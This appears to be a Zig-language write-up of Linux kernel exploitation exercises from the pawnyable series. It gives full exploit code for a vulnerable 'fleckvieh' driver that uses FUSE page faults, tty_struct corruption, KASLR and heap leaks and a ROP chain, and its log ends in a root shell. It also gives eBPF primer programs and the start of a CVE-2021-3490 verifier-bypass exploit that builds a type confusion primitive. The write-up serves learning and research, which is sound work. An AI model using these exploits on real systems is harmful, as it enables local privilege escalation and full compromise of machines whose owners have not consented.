       const std = @import("std");
       
       pub fn build(b: *std.Build) void {
           const target = b.resolveTargetQuery(.{
               .cpu_arch = .x86_64,
               .os_tag = .linux,
               .abi = .musl,
           });
           const optimize = b.standardOptimizeOption(.{});
       
           const exe = b.addExecutable(.{
               .name = "exploit",
               .root_source_file = b.path("main.zig"),
               .target = target,
               .optimize = optimize,
               .link_libc = true,
               .linkage = .static,
           });
       
           exe.linkSystemLibrary2("fuse", .{ .use_pkg_config = .yes, .preferred_link_mode = .static });
           exe.linkSystemLibrary("pthread");
           exe.linkSystemLibrary("dl");
           b.installArtifact(exe);
       }
       
        (The Zig bindings for FUSE are here [6])
       <<pawnyable-lib>>
       
       const fuse = @import("fuse29.zig");
       
       const content = "Hello world!\n";
       
       export fn getattrCallback(path: [*:0]const u8, stbuf: ?*linux.Stat) callconv(.C) i32 {
           std.log.info("getattrCallback", .{});
       
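            // span() stops at the NUL terminator, so short paths such as "/" are never read out of bounds
            if (std.mem.startsWith(u8, std.mem.span(path), "/file")) {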
               if (stbuf) |st| {
                   st.* = std.mem.zeroInit(linux.Stat, .{
                       .mode = linux.S.IFREG | 0o777,
                       .nlink = 1,
                       .size = content.len,
                   });
               }
               return 0;
           }
           return -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
       }
       
       export fn openCallback(_: [*:0]const u8, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           std.log.info("openCallback", .{});
           return 0;
       }
       
       export fn readCallback(path: [*:0]const u8, buf: [*]u8, size: usize, offset: i64, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           std.log.info("readCallback", .{});
       
            if (std.mem.startsWith(u8, std.mem.span(path), "/file")) {
               if (offset >= content.len) return 0;
       
               const length = @min(content.len - @as(usize, @intCast(offset)), size);
               @memcpy(buf[0..length], content[@as(usize, @intCast(offset))..][0..length]);
               return @intCast(length);
           }
           return -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
       }
       
       const fops = blk: {
           var tmp = std.mem.zeroes(fuse.fuse_operations);
           tmp.getattr = getattrCallback;
           tmp.open = openCallback;
           tmp.read = readCallback;
           break :blk tmp;
       };
       
       pub fn main() !void {
           try posix.mkdir("/tmp/test", 0o777);
           var fargs = fuse.fuse_args{};
       
           const chan = fuse.fuse_mount("/tmp/test", &fargs) orelse return error.FuseMountError;
           defer fuse.fuse_unmount("/tmp/test", chan);
       
           const f = fuse.fuse_new(chan, &fargs, &fops, @sizeOf(@TypeOf(fops)), null) orelse return error.FuseNewError;
       
           _ = fuse.fuse_set_signal_handlers(fuse.fuse_get_session(f));
           _ = fuse.fuse_loop_mt(f);
       }
       [INFO] getattrCallback
       [INFO] openCallback
       [INFO] readCallback
       Hello world!
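
        The only real logic in `readCallback` is clamping the request to what is left of the file. Pulled out of the FUSE callback it looks roughly like this; `readAt` is a name invented for this sketch, and it takes a slice instead of the raw pointer and size that libfuse passes.

        ```zig
        const std = @import("std");

        const content = "Hello world!\n";

        /// Copy the part of `content` starting at `offset` into `buf` and return
        /// the number of bytes written; 0 signals end of file.
        fn readAt(buf: []u8, offset: usize) usize {
            if (offset >= content.len) return 0;
            const length = @min(content.len - offset, buf.len);
            @memcpy(buf[0..length], content[offset..][0..length]);
            return length;
        }

        pub fn main() void {
            var buf: [8]u8 = undefined;
            var offset: usize = 0;
            // Drain the "file" 8 bytes at a time, the way successive reads would.
            while (true) {
                const n = readAt(&buf, offset);
                if (n == 0) break;
                std.debug.print("offset {d}: {d} bytes\n", .{ offset, n });
                offset += n;
            }
        }
        ```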
       
        Now, let's (ab)use it:
       <<pawnyable-lib>>
       <<pin-to-core>>
       <<tty_struct>>
       <<lk04-types>>
       <<lk04-ropchain>>
       
       const fuse = @import("fuse29.zig");
       
       fn getattrCallback(path: [*:0]const u8, stbuf: ?*linux.Stat) callconv(.C) i32 {
            const name = std.mem.span(path);
            if (std.mem.startsWith(u8, name, "/aar") or std.mem.startsWith(u8, name, "/aaw")) {
               if (stbuf) |st| {
                   st.* = std.mem.zeroInit(linux.Stat, .{
                       .mode = linux.S.IFREG | 0o777,
                       .nlink = 1,
                       .size = std.heap.page_size_min,
                   });
               }
               return 0;
           }
           return -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
       }
       
       fn openCallback(_: [*:0]const u8, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           return 0;
       }
       
       var fleck_fd: posix.fd_t = undefined;
       var ttys: [10]posix.fd_t = undefined;
       var victim_id: i32 = undefined;
       var blob_buf: [1024]u8 = undefined;
       
       fn readCallback(path: [*:0]const u8, buf: [*]u8, size: usize, _: i64, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           const ENOENT = -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
            if (std.mem.startsWith(u8, std.mem.span(path), "/aar")) {
               std.log.debug("Beginning AAR", .{});
            } else if (std.mem.startsWith(u8, std.mem.span(path), "/aaw")) {
               std.log.debug("Beginning AAW", .{});
       
               for (0..100) |_| {
                   _ = fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null) catch |err| {
                       std.log.err("blob_add failed with {any}", .{err});
                       return ENOENT;
                   };
               }
           } else {
               std.log.err("Unknown path {s}", .{path});
               return ENOENT;
           }
       
           _ = fleckvieh.ioctl(fleck_fd, .DEL, null, victim_id) catch |err| {
               std.log.err("blob_del failed with {any}", .{err});
               return ENOENT;
           };
       
           for (&ttys) |*tty| {
               tty.* = posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660) catch unreachable;
           }
       
           @memcpy(buf[0..1024], blob_buf[0..1024]);
           return @intCast(size);
       }
       
       const fops = blk: {
           var tmp = std.mem.zeroes(fuse.fuse_operations);
           tmp.getattr = getattrCallback;
           tmp.open = openCallback;
           tmp.read = readCallback;
           break :blk tmp;
       };
       
       fn fuseThread(fuse_ready: *std.Thread.ResetEvent) void {
           posix.mkdir("/tmp/pwn", 0o777) catch {
               std.log.err("Could not create /tmp/pwn", .{});
               return;
           };
           var fargs = fuse.fuse_args{};
       
           const chan = fuse.fuse_mount("/tmp/pwn", &fargs) orelse {
               std.log.err("fuse_mount failed", .{});
               return;
           };
           defer fuse.fuse_unmount("/tmp/pwn", chan);
       
           const f = fuse.fuse_new(chan, &fargs, &fops, @sizeOf(@TypeOf(fops)), null) orelse {
               std.log.err("fuse_new failed", .{});
               return;
           };
       
           _ = fuse.fuse_set_signal_handlers(fuse.fuse_get_session(f));
           fuse_ready.set();
           _ = fuse.fuse_loop_mt(f);
       }
       
       fn fusePage(comptime path: []const u8) ![]align(std.heap.page_size_min) u8 {
           const S = struct {
               var fd: ?posix.fd_t = null;
           };
           if (S.fd) |fd| posix.close(fd);
       
           S.fd = try posix.open(path, .{ .ACCMODE = .RDWR }, 0o660);
           return try posix.mmap(
               null,
               std.heap.page_size_min,
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE },
               S.fd.?,
               0,
           );
       }
       
       fn exploit() !void {
           const kaslr_offset = blk: {
               const aar_page = try fusePage("/tmp/pwn/aar");
               defer posix.munmap(aar_page);
               defer for (&ttys) |tty| posix.close(tty);
               victim_id = try fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null);
               _ = try fleckvieh.ioctl(fleck_fd, .GET, aar_page[0..0x20], victim_id);
       
               const ptmx_fops_addr: u64 = 0xffffffff81c3c3c0;
               break :blk std.mem.bytesAsValue(u64, aar_page[@offsetOf(tty_struct, "ops")..][0..@sizeOf(@FieldType(tty_struct, "ops"))]).* - ptmx_fops_addr;
           };
           adjust_offsets(kaslr_offset);
           std.log.info("Kernel base @ 0x{x}", .{0xffffffff81000000+kaslr_offset});
       
       
           const aar_page = try fusePage("/tmp/pwn/aar");
           defer posix.munmap(aar_page);
           const heap_leak = blk: {
               defer for (&ttys) |tty| posix.close(tty);
               victim_id = try fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null);
               _ = try fleckvieh.ioctl(fleck_fd, .GET, aar_page[0..1024], victim_id);
       
               const offset = @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(@FieldType(tty_struct, "ldisc_sem"), "read_wait");
               break :blk std.mem.bytesAsValue(u64, aar_page[offset..][0..8]).* - offset;
           };
           std.log.info("Heap leak = 0x{x}", .{heap_leak});
       
           {
               @memcpy(blob_buf[0..1024], aar_page[0..1024]);
               const aaw_page = try fusePage("/tmp/pwn/aaw");
               defer posix.munmap(aaw_page);
       
               const tty = std.mem.bytesAsValue(tty_struct, &blob_buf);
               tty.*.magic = 0x5401;
               tty.*.kref = 0;
               tty.*.dev = 0;
               tty.*.driver = heap_leak;
               tty.*.ops = heap_leak+0x100;
       
               // ensure ropchain is far away enough from important tty_struct internals
               @memcpy(blob_buf[0x100..][0..@sizeOf(tty_operations)], std.mem.asBytes(&tty_operations{ .ioctl = PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP }));
               _ = try ropchain(blob_buf[0x100..][@sizeOf(tty_operations)..]);
       
               victim_id = try fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null);
               _ = try fleckvieh.ioctl(fleck_fd, .SET, aaw_page[0..1024], victim_id);
           }
       
           for (&ttys) |tty| _ = linux.ioctl(tty, 0xdeadbeef, heap_leak+0x100+@sizeOf(tty_operations));
       }
       
       
       pub fn main() !void {
           {
               var cpu: linux.cpu_set_t = @splat(0);
               cpu[0] = 1;
               try linux.sched_setaffinity(linux.getpid(), &cpu);
           }
           catchSigsegv(&modprobePath);
           saveState();
       
           var fuse_ready = std.Thread.ResetEvent{};
           var t = try std.Thread.spawn(.{}, fuseThread, .{&fuse_ready});
           try pinThreadToCore(t.getHandle(), 0);
           t.detach();
           fuse_ready.wait();
       
           fleck_fd = try posix.open("/dev/fleckvieh", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fleck_fd);
       
           try exploit();
           std.log.debug("Wat", .{});
       
       }
       
       const DEBUG = true;
       user
       [DBUG] Beginning AAR
       [INFO] Kernel base @ 0xffffffff81200000
       [DBUG] Beginning AAR
       [INFO] Heap leak = 0xffffa244c3c08c00
       [DBUG] Beginning AAW
       [INFO] You won!!
       root
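
        Both exploits obtain `heap_leak` the same way: an empty `list_head` points at itself, so leaking `ldisc_sem.read_wait` and subtracting the field's offset gives the address of the `tty_struct` it lives in. A sketch of the arithmetic follows; `FakeTty` and its 0x38-byte header are a hypothetical layout for illustration (the real offsets come from the `tty_struct` definition), and the base address is the one printed in the log above.

        ```zig
        const std = @import("std");

        const ListHead = extern struct {
            next: u64,
            prev: u64,
        };

        // Hypothetical stand-in for tty_struct: only the shape matters here.
        const FakeTty = extern struct {
            header: [0x38]u8,
            read_wait: ListHead,
        };

        /// Recover the object's base address from a leaked empty list head.
        fn objectBase(leaked_next: u64) u64 {
            return leaked_next - @offsetOf(FakeTty, "read_wait");
        }

        pub fn main() void {
            // Pretend the kernel placed the object here.
            const base: u64 = 0xffffa244c3c08c00;
            // An empty list has next and prev pointing at the list head itself.
            const head_addr = base + @offsetOf(FakeTty, "read_wait");
            const leaked = ListHead{ .next = head_addr, .prev = head_addr };
            std.debug.print("recovered base = 0x{x}\n", .{objectBase(leaked.next)});
        }
        ```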
       
  (DIR) Full exploit
       
        Easy win.
       
       == Brahman
       
       
        Challenge information
       sed -i -E "s|^(echo 2 > /proc/sys/kernel/kptr_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s|^(echo 1 > /proc/sys/kernel/dmesg_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s/(setuidgid) 1337 (sh)/\1 0 \2/" rootfs/etc/init.d/S99pawnyable
       
       sed -i '/${DEBUG:+ -s} \\/d' run.sh
       sed -i -E '/qemu-system-x86_64 \\/a \ \ \ \ ${DEBUG:+ -s} \\' run.sh
       sed -i -E 's/ kaslr/ ${NOKASLR:+no}kaslr/' run.sh
       sed -i '/-serial unix:vm.sock,server,nowait/d' run.sh
       sed -i -E '/-monitor \/dev\/null/a \ \ \ \ -serial unix:vm.sock,server,nowait \\' run.sh
       SMEP enabled
       SMAP enabled
       KPTI enabled
       KASLR enabled
       
        This was my first experience with eBPF, so I studied it a little first [7].
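
        One detail worth knowing before reading the listing that follows: an eBPF 64-bit immediate load occupies two instruction slots, with the low 32 bits in the first slot's `imm` field and the high 32 bits in the second. That is the split `_ld_dw1` and `_ld_dw2` perform. The sketch below shows it in isolation; `immLow`, `immHigh` and `join` are names made up for this example and do not touch `BPF.Insn`.

        ```zig
        const std = @import("std");

        /// Low 32 bits, carried in the `imm` field of the first instruction slot.
        fn immLow(imm: u64) i32 {
            return @bitCast(@as(u32, @truncate(imm)));
        }

        /// High 32 bits, carried in the `imm` field of the second slot.
        fn immHigh(imm: u64) i32 {
            return @bitCast(@as(u32, @truncate(imm >> 32)));
        }

        /// Reassemble the 64-bit value from the two 32-bit halves.
        fn join(low: i32, high: i32) u64 {
            const lo: u64 = @as(u32, @bitCast(low));
            const hi: u64 = @as(u32, @bitCast(high));
            return (hi << 32) | lo;
        }

        pub fn main() void {
            const value: u64 = 0xcafebabedeadbeef;
            const lo = immLow(value);
            const hi = immHigh(value);
            std.debug.print("low = {d}, high = {d}\n", .{ lo, hi });
            std.debug.print("joined = 0x{x}\n", .{join(lo, hi)});
        }
        ```

        Going through `u32` with `@truncate` and `@bitCast` keeps the bit pattern intact even when the top bit of a half is set, a case where a checked integer cast to `i32` would fail.
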
       <<pawnyable-lib>>
       
       const BPF = linux.BPF;
       const AF = linux.AF;
       const SOCK = linux.SOCK;
       const SOL = linux.SOL;
       const SO = linux.SO;
       
       
       const SK = enum(i32) {
           DROP = 0,
           PASS,
       };
       
        // the std versions (BPF.Insn.ld_dw1/ld_dw2) are broken in 0.14.1, so reimplement them here
       fn _ld_dw1(dst: BPF.Insn.Reg, imm: u64) BPF.Insn {
           return .{
               .code = BPF.LD | BPF.DW | BPF.IMM,
               .dst = @intFromEnum(dst),
               .src = @intFromEnum(BPF.Insn.Reg.r0),
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm)))),
           };
       }
       fn _ld_dw2(imm: u64) BPF.Insn {
           return .{
               .code = 0,
               .dst = 0,
               .src = 0,
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm >> 32)))),
           };
       }
       
       fn bpf_string_map(str: [:0]const u8) !posix.fd_t {
           var attr = BPF.Attr{
               .map_create = std.mem.zeroes(BPF.MapCreateAttr),
           };
       
           attr.map_create.map_type = @intFromEnum(BPF.MapType.array);
           attr.map_create.key_size = @sizeOf(i32);
           attr.map_create.value_size = @sizeOf(u64);
           attr.map_create.max_entries = 1;
           attr.map_create.map_flags = BPF.BPF_F_RDONLY_PROG;
       
           const rc = linux.bpf(.map_create, &attr, @sizeOf(BPF.MapCreateAttr));
           const fd: posix.fd_t = switch (posix.errno(rc)) {
               .SUCCESS => @intCast(rc),
               .INVAL => return error.MapTypeOrAttrInvalid,
               .NOMEM => return error.SystemResources,
               .PERM => return error.AccessDenied,
               else => |err| return posix.unexpectedErrno(err),
           };
       
           try BPF.map_update_elem(fd, &std.mem.toBytes(@as(i32, 0)), str, BPF.ANY);
       
           attr = BPF.Attr{
               .map_elem = std.mem.zeroes(BPF.MapElemAttr),
           };
           attr.map_elem.map_fd = fd;
           try switch (posix.errno(linux.bpf(.map_freeze, &attr, @sizeOf(BPF.MapElemAttr)))) {
               .SUCCESS => {},
               else => |err| posix.unexpectedErrno(err),
           };
       
           return fd;
       }
       
       
       fn example1() !void {
           std.debug.print("---(BPF Example 1)---\n", .{});
       
           const insns = [_]BPF.Insn{
               .mov(.r0, 4),
               .exit(),
           };
       
           var verifier_log: [0x10000]u8 = undefined;
           var log = BPF.Log{ .buf = &verifier_log, .level = 2 };
           defer std.log.info("BPF Verifier output:\n{s}", .{std.mem.sliceTo(&verifier_log, 0)});
       
            const progfd = try BPF.prog_load(BPF.ProgType.socket_filter, &insns, &log, "GPL v3", 0, 0); // [8]
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           switch (posix.errno(linux.setsockopt(socks[0], SOL.SOCKET, SO.ATTACH_BPF, std.mem.asBytes(&progfd), 4))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
       
           const input = "Hello";
           _ = try posix.write(socks[1], input);
       
           var buf: [10]u8 = undefined;
           const n_read = try posix.read(socks[0], &buf);
       
           std.log.info("Sent '{s}', received '{s}'", .{ input, buf[0..n_read] });
       }
       
       fn example2() !void {
           std.debug.print("---(BPF Example 2)---\n", .{});
       
           const mapfd: i32 = try BPF.map_create(.array, @sizeOf(i32), @sizeOf(u64), 32);
       
           try BPF.map_update_elem(mapfd, &.{1}, &.{ 0xca, 0xfe, 0xba, 0xbe, 0xca, 0xfe, 0xba, 0xbe }, BPF.ANY);
       
           const insns = [_]BPF.Insn{
               .st(.double_word, .r10, -0x8, 1),
               .st(.double_word, .r10, -0x10, 0x1337),
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
       
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .mov(.r3, .r2),
               .add(.r3, -0x8),
               .mov(.r4, 0),
               .call(.map_update_elem),
       
               .mov(.r0, 0),
               .exit(),
           };
       
           var verifier_log: [0x10000]u8 = undefined;
           var log = BPF.Log{ .buf = &verifier_log, .level = 2 };
           defer std.log.info("BPF Verifier output:\n{s}", .{std.mem.sliceTo(&verifier_log, 0)});
       
           const progfd = try BPF.prog_load(BPF.ProgType.socket_filter, &insns, &log, "GPL v3", 0, 0);
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           switch (posix.errno(linux.setsockopt(socks[0], SOL.SOCKET, SO.ATTACH_BPF, std.mem.asBytes(&progfd), 4))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
       
           var buf: [1]u64 = undefined;
           try BPF.map_lookup_elem(mapfd, &.{1}, std.mem.asBytes(&buf));
           std.log.info("BPF_map[1] = 0x{x}", .{buf[0]});
       
           _ = try posix.write(socks[1], "dontcare");
           try BPF.map_lookup_elem(mapfd, &.{1}, std.mem.asBytes(&buf));
           std.log.info("BPF_map[1] = 0x{x}", .{buf[0]});
       }
       
       // requires root/BPF privileges for BPF_PROG_TYPE_SK_SKB and looping
       fn example3() !void {
           std.debug.print("---(BPF Example 3)---\n", .{});
       
           const mapfd = try bpf_string_map("evil");
       
           const insns = [_]BPF.Insn{
               .mov(.r6, .r1),
               .stx(.double_word, .r10, -0x8, .r1),
               .st(.double_word, .r10, -0x10, 0),
       
               // return if packet_len < 4 bytes
               .ldx(.double_word, .r1, .r10, -0x8),
               .ldx(.word, .r7, .r1, 0),
               .jmp(.jge, .r7, 4, 2),
               .mov(.r0, @intFromEnum(SK.PASS)),
               .exit(),
       
               // load "evil" into r9
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .mov(.r2, .r10),
               .add(.r2, -0x10),
               .call(.map_lookup_elem),
               .jmp(.jne, .r0, 0, 2),
               .mov(.r0, @intFromEnum(SK.DROP)),
               .exit(),
               .mov(.r9, .r0),
       
               // begin checking for "evil"
               .mov(.r8, 0),
               .mov(.r1, .r6),
               .mov(.r2, .r8),
               .mov(.r3, .r10),
               .add(.r3, -0x18),
               .mov(.r4, 4),
               .call(.skb_load_bytes),
               .jmp(.jlt, .r0, 0, 10),
       
               // drop packet if it contains "evil"
               .mov(.r1, .r10),
               .add(.r1, -0x18),
               .mov(.r2, 4),
               .mov(.r3, .r9),
               // .call(.strncmp),
               .{
                   .code = BPF.CALL | BPF.JMP,
                   .dst = 0,
                   .src = 0,
                   .off = 0,
                   .imm = 182,
               },
               .jmp(.jne, .r0, 0, 2),
               .mov(.r0, @intFromEnum(SK.DROP)),
               .exit(),
               .add(.r8, 1),
               .jmp(.jlt, .r8, 0x200, -17),
       
               // replace start of packet with 'evil'
               .mov(.r1, .r6),
               .mov(.r2, 0),
               .mov(.r3, .r9),
               .mov(.r4, 4),
               .mov(.r5, BPF_F_RECOMPUTE_CSUM),
               .call(.skb_store_bytes),
       
               .mov(.r0, @intFromEnum(SK.PASS)),
               .exit(),
           };
       
           // verifier is a little too chatty due to the number of iterations
           const progfd = try BPF.prog_load(.sk_skb, &insns, null, "GPL v3", 0, 0);
       
           const sockmapfd = try BPF.map_create(.sockmap, @sizeOf(i32), @sizeOf(i32), 1);
       
           _ = try blk: {
               const attr = BPF.Attr{
                   .prog_attach = .{
                       .target_fd = sockmapfd,
                       .attach_bpf_fd = progfd,
                       .attach_type = @intFromEnum(BPF.AttachType.sk_skb_stream_verdict),
                       .attach_flags = 0,
                       .replace_bpf_fd = 0,
                   },
               };
       
               break :blk switch (posix.errno(linux.bpf(.prog_attach, @constCast(&attr), @sizeOf(BPF.ProgAttachAttr)))) {
                   .SUCCESS => {},
                   .ACCES => error.UnsafeProgram,
                   .FAULT => unreachable,
                   .INVAL => error.InvalidProgram,
                   .PERM => error.PermissionDenied,
                   else => |err| posix.unexpectedErrno(err),
               };
           };
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM | SOCK.NONBLOCK, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           try BPF.map_update_elem(sockmapfd, &std.mem.toBytes(@as(i32, 0)), std.mem.asBytes(&socks[0]), BPF.ANY);
       
           const packets = [_][]const u8{
               "a",
               "aaaa",
               "imevil",
               "eviliam",
               "goodiam",
               "Lorem ipsum dolor sit amet, consectetur adipiscing elit.",
           };
       
           var buf: [0x100]u8 = undefined;
           for (packets) |p| {
               _ = try posix.write(socks[1], p);
               const n_read = posix.read(socks[0], &buf) catch 0;
               std.log.info("Sent '{s}', received '{s}'", .{ p, buf[0..n_read] });
           }
       }
       
       
       pub fn main() !void {
           try example1();
           try example2();
           try example3();
       }
       ---(BPF Example 1)---
       [INFO] Sent 'Hello', received 'Hell'
       [INFO] BPF Verifier output:
       func#0 @0
       0: R1=ctx(off=0,imm=0) R10=fp0
       0: (b7) r0 = 4                        ; R0_w=4
       1: (95) exit
       processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
       
       ---(BPF Example 2)---
       [INFO] BPF_map[1] = 0xbebafecabebafeca
       [INFO] BPF_map[1] = 0x1337
       [INFO] BPF Verifier output:
       func#0 @0
       0: R1=ctx(off=0,imm=0) R10=fp0
       0: (7a) *(u64 *)(r10 -8) = 1          ; R10=fp0 fp-8_w=mmmmmmmm
       1: (7a) *(u64 *)(r10 -16) = 4919      ; R10=fp0 fp-16_w=mmmmmmmm
       2: (18) r1 = 0xffff892b83b2b800       ; R1_w=map_ptr(off=0,ks=4,vs=8,imm=0)
       4: (bf) r2 = r10                      ; R2_w=fp0 R10=fp0
       5: (07) r2 += -8                      ; R2_w=fp-8
       6: (bf) r3 = r2                       ; R2_w=fp-8 R3_w=fp-8
       7: (07) r3 += -8                      ; R3_w=fp-16
       8: (b7) r4 = 0                        ; R4_w=0
       9: (85) call bpf_map_update_elem#2    ; R0_w=scalar()
       10: (b7) r0 = 0                       ; R0_w=0
       11: (95) exit
       processed 11 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
       
       ---(BPF Example 3)---
       [INFO] Sent 'a', received 'a'
       [INFO] Sent 'aaaa', received 'evil'
       [INFO] Sent 'imevil', received ''
       [INFO] Sent 'eviliam', received ''
       [INFO] Sent 'goodiam', received 'eviliam'
       [INFO] Sent 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', received 'evilm ipsum dolor sit amet, consectetur adipiscing elit.'
       
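       eBPF is quite powerful, but unprivileged users can call only a handful of helper functions (naturally).
       Even so, some helpers that I expected to work did not, for reasons I could not figure out (for example, `bpf_get_current_task`).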
       
       === CVE-2021-3490
       
       
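       This patch skips the call to `__mark_reg32_known` when both `src` and `dst` are known.
       The full explanation is somewhat involved, so I will defer to chompie [8] and ptr-yudai [9].
       In short: for a certain register, the BPF verifier believes the minimum value is 1 and the maximum value is 1, but the actual value is 2.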
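The mismatch can be replayed on concrete numbers. The sketch below is not part of the exploit; it only re-executes, in ordinary Zig arithmetic, the ALU instructions that `exploit_prologue` (further down this page) applies to the map value. The function name `prologueRuntimeValue` is made up for this illustration, and the map value is assumed to be 1, which is what `bpf_helper` stores.

```zig
const std = @import("std");

/// Replays the ALU steps of `exploit_prologue` on a concrete map value.
/// Hypothetical helper for illustration; not taken from the exploit.
fn prologueRuntimeValue(map_value: u64) u64 {
    // r1 = map value with its low 32 bits cleared (rsh 32, lsh 32)
    var r1: u64 = (map_value >> 32) << 32;
    // r2 = 0xfffffffe00000001: the 64-bit mov sign-extends the imm32,
    // then lsh 32 and add 1
    var r2: u64 = @bitCast(@as(i64, -2));
    r2 <<= 32;
    r2 +%= 1;
    r1 |= r2;
    // r2 = map value again (the program exits unless it is <= 1)
    r2 = map_value;
    r1 +%= r2;
    // 32-bit mov keeps only the low half
    r1 = @as(u32, @truncate(r1));
    // the final sub 1
    r1 -%= 1;
    return r1;
}

pub fn main() void {
    const r1 = prologueRuntimeValue(1);
    // kaslr_leak later adds 8 to this value and uses it as a length
    std.debug.print("runtime r1 = {d}, length passed on = 0x{x}\n", .{ r1, r1 + 8 });
}
```

According to the comments in the exploit, the verifier expects the resulting length to be 0x8 while the runtime value is 0x9, which is the one-byte overflow used in the next section.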
       
       I wanted to exploit this "without leaking the address of a BPF map, the BPF stack, or the context", which ruled out many approaches.
       const BPF = linux.BPF;
       const AF = linux.AF;
       const SOCK = linux.SOCK;
       const SOL = linux.SOL;
       const SO = linux.SO;
       
       // broken in 0.14.1
       fn _ld_dw1(dst: BPF.Insn.Reg, imm: u64) BPF.Insn {
           return .{
               .code = BPF.LD | BPF.DW | BPF.IMM,
               .dst = @intFromEnum(dst),
               .src = @intFromEnum(BPF.Insn.Reg.r0),
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm)))),
           };
       }
       fn _ld_dw2(imm: u64) BPF.Insn {
           return .{
               .code = 0,
               .dst = 0,
               .src = 0,
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm >> 32)))),
           };
       }
       
       fn bpf_helper(mapfd: posix.fd_t, insns: []const BPF.Insn, input: []const u8) !void {
           try BPF.map_update_elem(mapfd, &std.mem.toBytes(@as(i32, 0)), &.{1}, BPF.ANY);
       
           var verifier_log: [0x20000]u8 = undefined;
           var log = BPF.Log{ .buf = &verifier_log, .level = 2 };
           errdefer std.log.err("BPF Verifier output:\n{s}", .{std.mem.sliceTo(&verifier_log, 0)});
       
           const progfd = try BPF.prog_load(.socket_filter, insns, &log, "GPL v3", 0, 0);
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           switch (posix.errno(linux.setsockopt(socks[0], SOL.SOCKET, SO.ATTACH_BPF, std.mem.asBytes(&progfd), 4))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
       
           _ = try posix.write(socks[1], input);
       }
       
       fn confirm_unpriviledged_bpf() !void {
           // demonstrate that we don't have CAP_BPF or CAP_SYS_ADMIN by confirming that we can't load a BPF program that requires elevated capabilities.
           const insns = [_]BPF.Insn{
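               // BPF-to-BPF call: src = 1 is BPF_PSEUDO_CALL and imm = 2 is the relative
               // offset, so this targets the subprogram appended below (instruction 3).
               .{
                   .code = BPF.CALL | BPF.JMP,
                   .dst = 0,
                   .src = 1,
                   .off = 0,
                   .imm = 2,
               },
               .mov(.r0, 0),
               .exit(),
           } ++ [_]BPF.Insn{
               // subprogram body: return 0
               .mov(.r0, 0),
               .exit(),
           };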
       
           if (BPF.prog_load(.socket_filter, &insns, null, "GPL v3", 0, 0)) |_| {
               std.log.warn("User is bpf_capable! (Are you running this as root?)", .{});
           } else |err| switch (err) {
               error.AccessDenied => std.log.info("User is not bpf_capable", .{}),
               else => return err,
           }
       }
       
       ==== Type confusion primitive
       
       
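       Type confusion means convincing the verifier that a register has type A when it really has type B.
       Normally you would simply add the mis-tracked register described above to `r10`, but for an unprivileged user ALU sanitization is enabled, so pointer arithmetic is not that easy.
       `skb_load_bytes` can still be made to overflow, though, and I stumbled onto a neat idea: setting the lowest byte of an address to 0x00 is the same as subtracting some value in [0, 255] from that address.
       This fools the eBPF verifier into believing that `r1` is `r10-0x18` when it is actually `r10-0x20`; loading through `r1` then yields "type confusion".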
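The low-byte trick is easy to check in isolation. The following is a minimal sketch with a made-up stack address (it is not a leaked value, and `clearLowByte` is a hypothetical name): clearing the least significant byte of an 8-byte-aligned pointer moves it down by a multiple of 8 between 0 and 0xf8, which is the range the exploit comments give for `r7`.

```zig
const std = @import("std");

/// Clears the least significant byte of an address, which is what the
/// one-byte overflow does to the pointer saved on the BPF stack.
fn clearLowByte(addr: u64) u64 {
    return addr & ~@as(u64, 0xff);
}

pub fn main() void {
    // Hypothetical 8-byte-aligned stack address, used only for illustration.
    const saved: u64 = 0xffffc900001a7d58;
    const corrupted = clearLowByte(saved);
    std.debug.print("0x{x} -> 0x{x} (moved down by 0x{x})\n", .{ saved, corrupted, saved - corrupted });
}
```

Because the amount subtracted depends on the runtime address, the exploit cannot know it in advance, which is why `exploit_stack_confusion` writes a marker through the corrupted pointer and then scans the stack for it.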
       
